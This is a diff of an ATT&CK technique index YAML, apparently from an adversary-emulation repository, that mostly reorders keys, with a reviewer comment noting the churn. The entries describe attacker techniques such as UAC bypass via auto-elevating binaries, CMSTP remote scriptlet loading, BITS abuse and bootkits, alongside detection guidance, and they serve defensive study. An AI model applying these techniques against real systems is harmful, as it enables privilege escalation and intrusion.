+ created: '2017-05-31T21:31:23.195Z'
+ modified: '2020-03-25T20:35:21.672Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1111
+ url: https://attack.mitre.org/techniques/T1111
+ - url: https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf
+ description: Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved
+ January 10, 2016.
+ source_name: Mandiant M Trends 2011
+ - url: https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx
+ description: Jackson, William. (2011, June 7). RSA confirms its tokens used
+ in Lockheed hack. Retrieved September 24, 2018.
+ source_name: GCN RSA June 2011
+ - url: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
+ description: Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding
+ Holes Operation Emmental. Retrieved February 9, 2016.
+ source_name: Operation Emmental
description: "Adversaries may target two-factor authentication mechanisms, such
as smart cards, to gain access to credentials that can be used to access systems,
services, and network resources. Use of two or multi-factor authentication
@@ -19829,30 +20212,9 @@ credential-access:
the device and/or service is not secured, then it may be vulnerable to interception.
Although primarily focused on by cyber criminals, these authentication mechanisms
have been targeted by advanced actors. (Citation: Operation Emmental)"
- external_references:
- - source_name: mitre-attack
- external_id: T1111
- url: https://attack.mitre.org/techniques/T1111
- - url: https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf
- description: Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved
- January 10, 2016.
- source_name: Mandiant M Trends 2011
- - url: https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx
- description: Jackson, William. (2011, June 7). RSA confirms its tokens used
- in Lockheed hack. Retrieved September 24, 2018.
- source_name: GCN RSA June 2011
- - url: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
- description: Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding
- Holes Operation Emmental. Retrieved February 9, 2016.
- source_name: Operation Emmental
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-25T20:35:21.672Z'
- created: '2017-05-31T21:31:23.195Z'
+ name: Two-Factor Authentication Interception
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49
x_mitre_version: '1.1'
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
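Review bot: Nearly all of this hunk, and likewise the hunks for T1552, T1056.003, T1548, T1134, T1550.001, T1055.004, T1197, T1027.001, T1542.003, T1548.002 and T1218.003 below, is a reorder-only move of technique keys (`external_references`, `object_marking_refs`, `kill_chain_phases`, the `x_mitre_*` fields) with no change in value, which suggests the index is regenerated without a stable key order. That noise buries the few substantive edits in the commit — the updated `modified` timestamps, the `MTrends 2016` → `Mandiant M Trends 2016` citation and URL, and the `whitelisting`/`blacklists` wording updates — and would equally hide an accidental value change in a future regeneration. If the file is produced with PyYAML, dumping with `sort_keys=True` (or otherwise fixing the key order before serialising) would make regenerations diff-stable; if the order is meant to mirror the upstream STIX bundle, a comment in the generator saying so would save reviewers from reading every moved block. The T1111 object this hunk touches begins before the hunk.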
@@ -19882,26 +20244,26 @@ credential-access:
atomic_tests: []
T1552:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1552
- url: https://attack.mitre.org/techniques/T1552
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Unsecured Credentials
+ id: attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517
description: Adversaries may search compromised systems to find and obtain insecurely
stored credentials. These credentials can be stored and/or misplaced in many
locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)),
operating system or application-specific repositories (e.g. [Credentials in
Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized
files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).
- id: attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517
+ name: Unsecured Credentials
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1552
+ url: https://attack.mitre.org/techniques/T1552
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-31T12:53:56.541Z'
+ modified: '2020-06-17T14:25:38.461Z'
created: '2020-02-04T12:47:23.631Z'
x_mitre_platforms:
- Linux
@@ -19935,6 +20297,14 @@ credential-access:
atomic_tests: []
T1056.003:
technique:
+ created: '2020-02-11T18:59:50.058Z'
+ modified: '2020-03-24T21:16:16.580Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -19955,27 +20325,19 @@ credential-access:
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
source_name: Volexity Virtual Private Keylogging
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:16:16.580Z'
- created: '2020-02-11T18:59:50.058Z'
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: File monitoring may be used to detect changes to files in
- the Web directory for organization login pages that do not match with authorized
- updates to the Web server's content.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: File monitoring may be used to detect changes to files in
+ the Web directory for organization login pages that do not match with authorized
+ updates to the Web server's content.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
atomic_tests: []
defense-evasion:
T1548:
@@ -20002,14 +20364,17 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:18:44.286Z'
+ modified: '2020-06-25T19:57:54.923Z'
created: '2020-01-30T13:58:14.373Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - API monitoring
+ - Process monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
@@ -20018,15 +20383,12 @@ defense-evasion:
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - API monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1134:
technique:
@@ -20075,15 +20437,28 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:55:15.343Z'
+ modified: '2020-04-16T19:37:02.355Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_platforms:
- - Windows
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
+ - Heuristic Detection
+ - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Tom Ueltschi @c_APT_ure
+ - Travis Smith, Tripwire
+ - Robby Winchester, @robwinchester3
+ - Jared Atkinson, @jaredcatkinson
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ - API monitoring
+ - Access tokens
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: "If an adversary is using a standard command-line shell,
analysts can detect token manipulation by auditing command-line activity.
Specifically, analysts should look for use of the runas command.
@@ -20105,26 +20480,13 @@ defense-evasion:
and ParentProcessID (which are also produced from ETW and other utilities
such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId
identifies the actual parent process."
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- - API monitoring
- - Access tokens
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Tom Ueltschi @c_APT_ure
- - Travis Smith, Tripwire
- - Robby Winchester, @robwinchester3
- - Jared Atkinson, @jaredcatkinson
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- - Heuristic Detection
- - Host forensic analysis
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1550.001:
technique:
@@ -20170,23 +20532,23 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-23T20:24:52.899Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_detection: Monitor access token activity for abnormal use and permissions
+ granted to unusual or suspicious applications and APIs.
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- Mark Wee
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- x_mitre_detection: Monitor access token activity for abnormal use and permissions
- granted to unusual or suspicious applications and APIs.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1055.004:
technique:
@@ -20245,12 +20607,14 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-23T13:20:55.893Z'
+ modified: '2020-06-20T22:17:05.394Z'
created: '2020-01-14T01:29:43.786Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -20263,12 +20627,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -20351,31 +20713,31 @@ defense-evasion:
phase_name: persistence
modified: '2020-03-25T23:28:10.049Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Ricardo Dias
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Packet capture
- - Windows event logs
- x_mitre_defense_bypassed:
- - Firewall
- - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host forensic analysis
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Packet capture
+ - Windows event logs
+ x_mitre_contributors:
+ - Ricardo Dias
+ - Red Canary
+ x_mitre_version: '1.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -20468,25 +20830,6 @@ defense-evasion:
name: command_prompt
T1027.001:
technique:
- id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5
- description: "Adversaries may use binary padding to add junk data and change
- the on-disk representation of malware. This can be done without affecting
- the functionality or behavior of a binary, but can increase the size of the
- binary beyond what some security tools are capable of handling due to file
- size limitations. \n\nBinary padding effectively changes the checksum of the
- file and can also be used to avoid hash-based blacklists and static anti-virus
- signatures.(Citation: ESET OceanLotus) The padding used is commonly generated
- by a function to create junk data and then appended to the end or applied
- to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing
- the file size may decrease the effectiveness of certain tools and detection
- capabilities that are not designed or configured to scan large files. This
- may also reduce the likelihood of being collected for analysis. Public file
- scanning services, such as VirusTotal, limits the maximum size of an uploaded
- file to be analyzed.(Citation: VirusTotal FAQ) "
- name: Binary Padding
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1027.001
@@ -20505,11 +20848,30 @@ defense-evasion:
- source_name: VirusTotal FAQ
url: 'https://www.virustotal.com/en/faq/ '
description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Binary Padding
+ description: "Adversaries may use binary padding to add junk data and change
+ the on-disk representation of malware. This can be done without affecting
+ the functionality or behavior of a binary, but can increase the size of the
+ binary beyond what some security tools are capable of handling due to file
+ size limitations. \n\nBinary padding effectively changes the checksum of the
+ file and can also be used to avoid hash-based blocklists and static anti-virus
+ signatures.(Citation: ESET OceanLotus) The padding used is commonly generated
+ by a function to create junk data and then appended to the end or applied
+ to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing
+ the file size may decrease the effectiveness of certain tools and detection
+ capabilities that are not designed or configured to scan large files. This
+ may also reduce the likelihood of being collected for analysis. Public file
+ scanning services, such as VirusTotal, limits the maximum size of an uploaded
+ file to be analyzed.(Citation: VirusTotal FAQ) "
+ id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:49:04.050Z'
+ modified: '2020-06-20T20:50:48.023Z'
created: '2020-02-05T14:04:25.865Z'
x_mitre_contributors:
- Martin Jirkal, ESET
@@ -20568,10 +20930,10 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
- - url: https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf
- description: Mandiant. (2016, February). M-Trends 2016. Retrieved January
- 4, 2017.
- source_name: MTrends 2016
+ - source_name: Mandiant M Trends 2016
+ url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
+ description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
+ March 5, 2019.
- url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion?
(Infographic). Retrieved November 13, 2014.
@@ -20583,7 +20945,7 @@ defense-evasion:
description: |-
Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
- A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
+ A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
@@ -20593,30 +20955,45 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:43:32.353Z'
+ modified: '2020-05-07T22:32:05.335Z'
created: '2019-12-19T21:05:38.123Z'
- x_mitre_platforms:
- - Linux
- - Windows
- x_mitre_data_sources:
- - VBR
- - MBR
- - API monitoring
- x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
- of MBR and VBR and compare against known good samples. Report changes to MBR
- and VBR as they occur for indicators of suspicious activity and further analysis.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
+ of MBR and VBR and compare against known good samples. Report changes to MBR
+ and VBR as they occur for indicators of suspicious activity and further analysis.
+ x_mitre_data_sources:
+ - VBR
+ - MBR
+ - API monitoring
+ x_mitre_platforms:
+ - Linux
+ - Windows
atomic_tests: []
T1548.002:
technique:
+ id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
+ description: |-
+ Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
+
+ If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
+
+ Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
+
+ * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
+
+ Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
+ name: Bypass User Access Control
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1548.002
@@ -20660,28 +21037,13 @@ defense-evasion:
description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe.
Retrieved May 25, 2017.
source_name: enigma0x3 sdclt bypass
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bypass User Access Control
- description: |-
- Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
-
- If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
-
- Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
-
- * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
-
- Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:11:48.618Z'
+ modified: '2020-06-25T19:57:54.510Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -20907,7 +21269,7 @@ defense-evasion:
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
- Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
+ Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49
@@ -20915,10 +21277,23 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T17:19:19.483Z'
+ modified: '2020-06-20T22:34:03.247Z'
created: '2020-01-23T18:27:30.656Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Nik Seetharaman, Palantir
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
@@ -20926,21 +21301,8 @@ defense-evasion:
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Application whitelisting
- x_mitre_data_sources:
- - Windows event logs
- - Process use of network
- - Process command-line parameters
- - Process monitoring
- x_mitre_contributors:
- - Nik Seetharaman, Palantir
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ x_mitre_platforms:
+ - Windows
identifier: T1218.003
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
@@ -20993,12 +21355,94 @@ defense-evasion:
'
name: command_prompt
- T1551.003:
+ T1574.012:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.003
- url: https://attack.mitre.org/techniques/T1551/003
+ external_id: T1574.012
+ url: https://attack.mitre.org/techniques/T1574/012
+ - source_name: Microsoft Profiling Mar 2017
+ url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
+ description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
+ 24, 2020.
+ - source_name: Microsoft COR_PROFILER Feb 2013
+ url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
+ description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
+ and Attach. Retrieved June 24, 2020.
+ - source_name: RedCanary Mockingbird May 2020
+ url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
+ description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
+ May 26, 2020.
+ - source_name: Red Canary COR_PROFILER May 2020
+ url: https://redcanary.com/blog/cor_profiler-for-persistence/
+ description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
+ for persistence. Retrieved June 24, 2020.
+ - source_name: Almond COR_PROFILER Apr 2019
+ url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
